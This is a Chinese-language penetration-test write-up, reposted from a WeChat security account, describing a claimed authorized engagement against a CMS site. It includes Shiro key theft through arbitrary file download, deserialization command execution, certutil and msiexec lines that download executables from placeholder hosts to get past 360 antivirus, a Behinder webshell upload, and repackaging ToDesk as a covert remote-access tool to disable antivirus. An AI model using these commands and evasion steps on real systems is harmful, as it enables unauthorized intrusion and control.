信息收集

在一次授权渗透测试项目中，访问目标站点，找到其后台登录页面,对源码进行分析，确定是某cms

对网站进行分析，在数据包中发现_rememberMe等字段，惊喜！惊喜！惊喜！幸运女神我爱你——存在shiro框架。

虽然有了shiro但是不能骄傲，再去找找其他的洞，毕竟，洞这东西得靠自己找才行。

然后 顺利的又找到了一个任意文件下载的漏洞。接下来先利用目前已有的信息进行渗透 ！

网站渗透

暴力破解

查看数据包发现，账户密码未进行加密处理且连续发包验证码可重复利用，直接开爆

爆破这块不再过多赘述，在爆破这段时间再去利用一下shiro框架漏洞

shiro反序列化

尝试shiro组件漏洞，一顿操作 发现没有爆出来key，摆烂中。。。。

究其原因就是：新版本Shiro(>=1.4.2)采⽤了AES-GCM加密⽅式，Shiro高版本下的漏洞利用，就需要考虑加密模式变化的情况。

旧版⼯具的加密算法⽆法正常利⽤漏洞 如果知道硬编码的情况下可以使⽤⼯具

知道了解决方法，那就继续摆烂......

摆烂摆烂，既然shiro这条路走不通，那就换条路走吧 古人还云：条条大路还通罗马呢！（幸运女神-拜拜！）

在放弃的边缘想起，不是还找到了任意文件下载漏洞嘛，这是脑子！自己找的洞都忘了！于是利用任意文件下载漏洞将存储key值的文件下载出来！

于是乎找到源码，网上查找存储shiro框架key的地方。

WEB-INFclassesapplication.yml

利用任意下载将其下下来拿到朝思暮想的key

命令执⾏ shiro⼀般使⽤ CommonsBeanutils1 这⽆依赖链⼦

将找到的key轻轻的放入对应的位置

见证奇迹的时刻！！！

哦~哦~这就很美丽！

心里想着 有key了，有构造链了，接下来之路岂不是一马平川，万马奔腾，“我要策马奔腾向你怀中，解开思念的谜千年的梦......”一首老歌瞬间在耳中响起。接下来继续操作

执行命令发现是system权限 ，这就很nice！

但是在执行几条命令后 发现 有些敏感命令执行不了 ，于是乎查看了一下进程情况，哦 一首凉凉送给我：“凉凉夜色为你思念成河，化作春泥呵护着我”——360全家桶。

执⾏⼀些危险命令360主动防御会⾃动拦截⽽且没有什么好的⽅法进⾏绕过。以前使⽤这些语句可以绕过下载拦截 。

Certutil & Certutil –urlcache –f –split http://xxx.xxx.xxx.xxx/python3.exe

Certutil | Certutil –urlcache –f –split http://xxx.xxx.xxx.xxx/python3.exe

certutil|certutil -urlcache split -f http://xxx.com/dns.exe

copy c:windowssystem32certutil.exe c.exec -urlcache -split -f http://xxx.com/dns.exe

msiexec /q /i http://xxx.xxx.xxx.xxx/cmd.png

如果这些都绕不过 直接在⽹站上传⽂件就可以了。没必要与主动防御较劲。

弱口令

能用的洞也用完了 ， 爆破也结束了 ，该说不说 ，上天给你关上一扇门必会给你打开一扇窗（一个小洞也行）。很成功的爆破出来了账户密码，弱口令牛逼！！！

查看该cms历史漏洞，发现存在一处上传文件地方

此时想着:“能进入后台直接在⽹站上传⽂件就可以了,没必要与主动防御较劲,难道非要撞了南墙才回头嘛。”

后台模块管理处 存在⾃解压

上传冰蝎的jsp马子 进行连接，成功连接！！！

利用todesk企业版制作免杀工具

1，注册todesk企业版

2，下载控制端安装登录

3，在网页个人中心里面，找到设备码，就是安装码，也叫部署码。记住这个，上线要用到。

4，下载客户端，被控端，找个虚拟机，安装。

5，将安装好的的文件中ToDesk_Host_Service.EXE和ToDesk_HosT.exe两个文件拖出来把ToDesk_HosT.exe 修改文件名，改成 ToDesk_.exe并打包

然后这两个文件打包好，上传到目标主机。

6，然后补充路径，直接运行

利用设置好的连接码进行连接上线。

连接上之后上去关掉360，进行内网渗透。

结语：

回顾整个渗透过程，处处充满惊喜但又处处充满意外，整个过程的心情就像是过山车，刺激！！！

原文始发于微信公众号（哈拉少安全小队）：记一次曲折的Getshell过程